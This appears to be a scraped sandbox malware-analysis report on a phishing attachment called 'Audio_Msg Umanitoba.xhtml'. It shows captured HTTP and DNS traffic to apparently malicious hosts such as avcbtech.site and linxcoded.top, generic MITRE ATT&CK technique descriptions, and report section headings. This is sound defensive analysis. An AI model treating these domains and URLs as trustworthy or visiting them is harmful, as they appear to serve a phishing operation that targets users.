Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud83d#Udd0aAudio_Msg Umanitoba.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Static File Info

General

Static OLE Info

General

OLE File "#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml